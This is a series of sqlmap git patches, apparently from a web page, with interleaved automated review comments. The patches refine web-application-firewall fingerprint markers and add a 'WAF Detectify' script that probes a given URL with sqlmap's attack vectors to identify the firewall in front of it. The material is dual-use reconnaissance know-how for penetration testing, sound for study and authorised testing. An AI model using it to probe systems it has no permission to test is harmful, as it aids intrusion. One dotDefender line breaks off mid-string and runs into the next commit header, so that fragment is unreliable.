lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 8be4b29fd10ea0dc65074eedd1862bbcbd745ad8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 12:13:22 +0200 Subject: [PATCH 244/428] Update of Incapsula WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/incapsula.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c5a45ea519b..f46f88db99c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.21" +VERSION = "1.2.8.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7b6c3efaed0..a1ef50d6f2d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8b9c8ae316a1cdf5809b163d7d451ca5 lib/core/settings.py +cf04fd985a50e6c7fc6b6d61b4b048b6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -415,7 +415,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py eb56ac34775cc3c5f721ec967d04b283 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -2a52c09e4ce1f2a5976ce53b415ef496 waf/incapsula.py +51aed66945f95641cb45c840e7132e3b waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py diff --git a/waf/incapsula.py b/waf/incapsula.py index e08ba65df8f..babf1d59ba6 100644 --- a/waf/incapsula.py +++ b/waf/incapsula.py 
@@ -19,7 +19,7 @@ def detect(get_page): page, headers, _ = get_page(get=vector) retval = re.search(r"incap_ses|visid_incap", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= re.search(r"Incapsula", headers.get("X-CDN", ""), re.I) is not None - retval |= "Incapsula incident ID" in (page or "") + retval |= any(_ in (page or "") for _ in ("Incapsula incident ID", "_Incapsula_Resource?")) retval |= headers.get("X-Iinfo") is not None if retval: break From 0bbf5f94675a6f96d6f80904c8196065ed95c04b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 12:21:33 +0200 Subject: [PATCH 245/428] Update of dotDefender WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/dotdefender.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f46f88db99c..1af9fd1e032 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.22" +VERSION = "1.2.8.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a1ef50d6f2d..0dbc59dc88c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cf04fd985a50e6c7fc6b6d61b4b048b6 lib/core/settings.py +b52affaeb83ecf36e15e75bd439df284 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py 
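Review bot: In the new `any(...)` expression the loop variable is `_`, which by convention marks a value that is ignored, yet here it is the marker being searched for; the dotDefender, Kona and ZENEDGE hunks later on this page use the same idiom. A named variable reads better: `retval |= any(marker in (page or "") for marker in ("Incapsula incident ID", "_Incapsula_Resource?"))`. These markers are exact, case-sensitive substring tests whereas the header checks just above use `re.I`, which is worth a short comment if the asymmetry is intended. detect's body continues outside the hunk.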
@@ -409,7 +409,7 @@ ac96f34c254951d301973617064eb1b5 waf/comodo.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py 0182d23b34cf903537f77f4ec4b144bf waf/distil.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py -357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py +9760a22990f55ab51ea4eedabd939055 waf/dotdefender.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py 954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py diff --git a/waf/dotdefender.py b/waf/dotdefender.py index b7713e21c63..2a49b0def41 100644 --- a/waf/dotdefender.py +++ b/waf/dotdefender.py @@ -15,7 +15,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, _ = get_page(get=vector) retval = headers.get("X-dotDefender-denied", "") == "1" - retval |= "dotDefender Blocked Your Request" in (page or "") + retval |= any(_ in (page or "") for _ in ("dotDefender Blocked Your Request", ' Date: Thu, 30 Aug 2018 14:54:15 +0200 Subject: [PATCH 246/428] Created a WAF Detectify utility --- extra/wafdetectify/__init__.py | 8 +++ extra/wafdetectify/wafdetectify.py | 107 +++++++++++++++++++++++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +- 4 files changed, 119 insertions(+), 2 deletions(-) create mode 100644 extra/wafdetectify/__init__.py create mode 100644 extra/wafdetectify/wafdetectify.py diff --git a/extra/wafdetectify/__init__.py b/extra/wafdetectify/__init__.py new file mode 100644 index 00000000000..7181b22a163 --- /dev/null +++ b/extra/wafdetectify/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py new file mode 100644 index 00000000000..5192e152094 --- /dev/null +++ b/extra/wafdetectify/wafdetectify.py 
@@ -0,0 +1,107 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import cookielib +import glob +import httplib +import inspect +import os +import re +import subprocess +import sys +import urllib +import urllib2 +import urlparse + +sys.dont_write_bytecode = True + +NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "Miroslav Stampar (@stamparm)" +TIMEOUT = 10 +HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cache-Control": "max-age=0"} +SQLMAP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")) +SCRIPTS_DIR = os.path.join(SQLMAP_DIR, "waf") +CACHE = {} +WAF_FUNCTIONS = [] + +def get_page(get=None, url=None, host=None, data=None): + key = (get, url, host, data) + + if key in CACHE: + return CACHE[key] + + page, headers, code = None, {}, httplib.OK + + url = url or ("%s%s%s" % (sys.argv[1], '?' if '?' 
not in sys.argv[1] else '&', get) if get else sys.argv[1]) + if not url.startswith("http"): + url = "http://%s" % url + + try: + req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS) + page = urllib2.urlopen(req, timeout=TIMEOUT).read() + except Exception, ex: + code = getattr(ex, "code", None) + page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "") + + result = CACHE[key] = page, headers, code + + return result + +def main(): + global WAF_FUNCTIONS + + print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR) + + if len(sys.argv) < 2: + exit("[x] usage: python %s " % os.path.split(__file__)[-1]) + + cookie_jar = cookielib.CookieJar() + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar)) + urllib2.install_opener(opener) + + sys.path.insert(0, SQLMAP_DIR) + + for found in glob.glob(os.path.join(SCRIPTS_DIR, "*.py")): + dirname, filename = os.path.split(found) + dirname = os.path.abspath(dirname) + + if filename == "__init__.py": + continue + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + if filename[:-3] in sys.modules: + del sys.modules[filename[:-3]] + module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or "utf8")) + except ImportError, msg: + exit("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) + + _ = dict(inspect.getmembers(module)) + if "detect" not in _: + exit("[x] missing function 'detect(get_page)' in WAF script '%s'" % found) + else: + WAF_FUNCTIONS.append((_["detect"], _.get("__product__", filename[:-3]))) + + WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower()) + + print "[i] %d (sqlmap's) WAF scripts loaded" % len(WAF_FUNCTIONS) + + found = False + for function, product in WAF_FUNCTIONS: + if found and "unknown" in product.lower(): + continue + + if function(get_page): + print "[!] 
WAF/IPS/IDS identified as '%s'" % product + found = True + + if not found: + print "[o] nothing found" + +if __name__ == "__main__": + main() diff --git a/lib/core/settings.py b/lib/core/settings.py index 1af9fd1e032..42c97278d84 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.23" +VERSION = "1.2.8.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0dbc59dc88c..96d13ebbfc8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,6 +21,8 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py +1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py +cf646f49087ff56d752dc831d2245a51 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -48,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b52affaeb83ecf36e15e75bd439df284 lib/core/settings.py +4ecbe8858ce030877cb3e00f437ac87a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 74d2b60cf3f6854f3a5b407abfdeb3057b789473 Mon Sep 17 00:00:00 2001 
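Review bot: `HEADERS` advertises `"Accept-Encoding": "gzip, deflate"`, but `get_page` stores `urllib2.urlopen(req, timeout=TIMEOUT).read()` verbatim and urllib2 does not decompress, so a server that honours the header hands the WAF scripts a compressed blob and every page-body marker test (`"Incapsula incident ID" in (page or "")` and the like) silently fails; drop that entry from `HEADERS`, or decompress according to `Content-Encoding` before caching. The body is also read without a bound, so a large or slow response from a host the tool does not control costs unbounded memory; a capped read such as `page = urllib2.urlopen(req, timeout=TIMEOUT).read(MAX_PAGE_SIZE)` (constant to be added) contains that. In `main`, `found` is first the path bound by `for found in glob.glob(...)` and then reused as the "WAF identified" flag, and a single `detect` that raises aborts the whole run without naming the script; the rewrite below keeps the remaining scripts running and reports the failing one. `headers` returned by `get_page` is always the initial `{}` in this revision, so header-based scripts cannot match yet.
```python
    found = False
    for function, product in WAF_FUNCTIONS:
        if found and "unknown" in product.lower():
            continue

        try:
            identified = function(get_page)
        except Exception, ex:
            print "[x] WAF script '%s' raised %s: %s" % (product, ex.__class__.__name__, ex)
            continue

        if identified:
            print "[!] WAF/IPS/IDS identified as '%s'" % product
            found = True
    # … unchanged: "nothing found" report …
```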
From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:18:42 +0200 Subject: [PATCH 247/428] Minor colorization of WAF Detectify --- extra/wafdetectify/wafdetectify.py | 29 ++++++++++++++++++++--------- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/generic.py | 2 +- 4 files changed, 25 insertions(+), 14 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 5192e152094..f0ebd8c601a 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -19,11 +19,12 @@ sys.dont_write_bytecode = True -NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "Miroslav Stampar (@stamparm)" +NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "sqlmap developers (@sqlmap)" TIMEOUT = 10 HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cache-Control": "max-age=0"} SQLMAP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")) SCRIPTS_DIR = os.path.join(SQLMAP_DIR, "waf") +LEVEL_COLORS = {"o": "\033[00;94m", "x": "\033[00;91m", "!": "\033[00;93m", "i": "\033[00;92m"} CACHE = {} WAF_FUNCTIONS = [] @@ -41,7 +42,9 @@ def get_page(get=None, url=None, host=None, data=None): try: req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS) - page = urllib2.urlopen(req, timeout=TIMEOUT).read() + conn = urllib2.urlopen(req, timeout=TIMEOUT) + page = conn.read() + headers = conn.info() except Exception, ex: code = getattr(ex, "code", None) page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "") 
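Review bot: `conn` returned by `urllib2.urlopen` is read but never closed, so the socket lingers until garbage collection; add `conn.close()` after `headers = conn.info()`, or wrap the two reads in `contextlib.closing(...)`. The success path now yields an `httplib.HTTPMessage` while the `except` path leaves `headers` as the initial `{}`, so callers receive two different types, and the generic.py hunk of this same commit already has to guard with `headers.headers if headers else {}`. Normalising both paths to one type would let the WAF scripts drop that guard. get_page's body continues outside the hunk.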
@@ -50,13 +53,21 @@ def get_page(get=None, url=None, host=None, data=None): return result +def colorize(message): + if not subprocess.mswindows: + message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message) + message = message.replace("@sqlmap", "\033[00;96m@sqlmap\033[00;49m") + message = message.replace(NAME, "\033[00;93m%s\033[00;49m" % NAME) + + return message + def main(): global WAF_FUNCTIONS - print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR) + print colorize("%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)) if len(sys.argv) < 2: - exit("[x] usage: python %s " % os.path.split(__file__)[-1]) + exit(colorize("[x] usage: python %s " % os.path.split(__file__)[-1])) cookie_jar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar)) @@ -79,17 +90,17 @@ def main(): del sys.modules[filename[:-3]] module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or "utf8")) except ImportError, msg: - exit("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) + exit(colorize("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], msg))) _ = dict(inspect.getmembers(module)) if "detect" not in _: - exit("[x] missing function 'detect(get_page)' in WAF script '%s'" % found) + exit(colorize("[x] missing function 'detect(get_page)' in WAF script '%s'" % found)) else: WAF_FUNCTIONS.append((_["detect"], _.get("__product__", filename[:-3]))) WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower()) - print "[i] %d (sqlmap's) WAF scripts loaded" % len(WAF_FUNCTIONS) + print colorize("[i] %d WAF scripts loaded" % len(WAF_FUNCTIONS)) found = False for function, product in WAF_FUNCTIONS: 
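Review bot: `LEVEL_COLORS[match.group(1)]` in `colorize` raises `KeyError` for any bracketed single character other than `o`, `x`, `!` or `i`, and the regex `\[(.)\]` is run over the whole message, which includes `__product__` strings and import error text supplied by WAF scripts; a `[1]` or `[A]` anywhere in that text crashes the print. Anchoring the substitution to the level tag at the start of the message removes the failure mode: `message = re.sub(r"\A\[([oxi!])\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message)`. `subprocess.mswindows` is an undocumented attribute; `os.name == "nt"` is the supported check. The hunk also covers the start of main, whose body continues outside it.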
@@ -97,11 +108,11 @@ def main(): continue if function(get_page): - print "[!] WAF/IPS/IDS identified as '%s'" % product + print colorize("[!] WAF/IPS/IDS identified as '%s'" % product) found = True if not found: - print "[o] nothing found" + print colorize("[o] nothing found") if __name__ == "__main__": main() diff --git a/lib/core/settings.py b/lib/core/settings.py index 42c97278d84..a016a8a5763 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.24" +VERSION = "1.2.8.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 96d13ebbfc8..8f078653ca4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -cf646f49087ff56d752dc831d2245a51 extra/wafdetectify/wafdetectify.py +85ca5478dc2bd9db40772e52dad2f84a extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py 
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4ecbe8858ce030877cb3e00f437ac87a lib/core/settings.py +13758369fddb4d7e791e989966908ee6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -415,7 +415,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py 954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py -eb56ac34775cc3c5f721ec967d04b283 waf/generic.py +ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py 51aed66945f95641cb45c840e7132e3b waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py diff --git a/waf/generic.py b/waf/generic.py index 4db58805828..4be618d8813 100644 --- a/waf/generic.py +++ b/waf/generic.py @@ -26,7 +26,7 @@ def detect(get_page): if code >= 400 or (IDS_WAF_CHECK_PAYLOAD in vector and (code is None or re.search(GENERIC_PROTECTION_REGEX, page or "") and not re.search(GENERIC_PROTECTION_REGEX, original or ""))): if code is not None: - kb.wafSpecificResponse = "HTTP/1.1 %s\n%s\n%s" % (code, "".join(_ for _ in headers.headers or [] if not _.startswith("URI")), page) + kb.wafSpecificResponse = "HTTP/1.1 %s\n%s\n%s" % (code, "".join(_ for _ in (headers.headers if headers else {}) or [] if not _.startswith("URI")), page) retval = True break From 366a3f9336b2a39af405270699f0afa616ce1b98 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:21:46 +0200 Subject: [PATCH 248/428] Detect redirect from stdout --- extra/wafdetectify/wafdetectify.py | 4 +++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) 
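Review bot: The guard `(headers.headers if headers else {}) or []` builds a `{}` that is immediately discarded by `or []`, and it still assumes a truthy `headers` has a `.headers` attribute, which is not the case for a plain dict. `getattr(headers, "headers", None) or []` expresses the same intent in one step and tolerates both the `httplib.HTTPMessage` and the empty-dict shapes that get_page can return. detect's body continues outside the hunk.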
diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index f0ebd8c601a..e927756133a 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -54,7 +54,7 @@ def get_page(get=None, url=None, host=None, data=None): return result def colorize(message): - if not subprocess.mswindows: + if not subprocess.mswindows and sys.stdout.isatty(): message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message) message = message.replace("@sqlmap", "\033[00;96m@sqlmap\033[00;49m") message = message.replace(NAME, "\033[00;93m%s\033[00;49m" % NAME) @@ -114,5 +114,7 @@ def main(): if not found: print colorize("[o] nothing found") + print + if __name__ == "__main__": main() diff --git a/lib/core/settings.py b/lib/core/settings.py index a016a8a5763..54e7c282ff8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.25" +VERSION = "1.2.8.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8f078653ca4..9e42d80e76f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -85ca5478dc2bd9db40772e52dad2f84a extra/wafdetectify/wafdetectify.py +5a5d4305e9dd22c3ba06b8587dad9db7 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -13758369fddb4d7e791e989966908ee6 lib/core/settings.py +d30a78044622a9f97a2b62eec4c62e95 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 62a361835353f2478d8ef04e7db244c204153b89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:50:17 +0200 Subject: [PATCH 249/428] Minor patches --- extra/wafdetectify/wafdetectify.py | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/kona.py | 2 +- 4 files changed, 6 insertions(+), 5 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index e927756133a..248a009e77d 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -48,6 +48,7 @@ def get_page(get=None, url=None, host=None, data=None): except Exception, ex: code = getattr(ex, "code", None) page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "") + headers = ex.info() if hasattr(ex, "info") else {} result = CACHE[key] = page, headers, code 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 54e7c282ff8..0c597f443fd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.26" +VERSION = "1.2.8.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9e42d80e76f..0bc9adaace2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -5a5d4305e9dd22c3ba06b8587dad9db7 extra/wafdetectify/wafdetectify.py +0142de525def5e3f17092dcc1ed67c95 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d30a78044622a9f97a2b62eec4c62e95 lib/core/settings.py +fe3bc1dc84fcdfc26e552984f6c4b139 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py 
@@ -422,7 +422,7 @@ ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py 898f53c12133da3e946301f4aa97d538 waf/knownsec.py -81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py +15a50edd48961ea168648a370f42e123 waf/kona.py b17a154fe7959619eaafffa60e14199f waf/modsecurity.py d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py diff --git a/waf/kona.py b/waf/kona.py index 47824f0198d..f24702411d0 100644 --- a/waf/kona.py +++ b/waf/kona.py @@ -17,7 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = code in (400, 403, 501) and re.search(r"Reference #[0-9a-f.]+", page or "", re.I) is not None + retval = code in (400, 403, 501) and all(_ in (page or "") for _ in ("Access Denied", "You don't have permission to access", "on this server", "Reference")) retval |= re.search(r"AkamaiGHost", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None if retval: break From 287371337d9bc0b3f2386880103abf4716ea870c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:56:13 +0200 Subject: [PATCH 250/428] Update of ZENEDGE WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/zenedge.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c597f443fd..bbd640edbf5 100644 --- 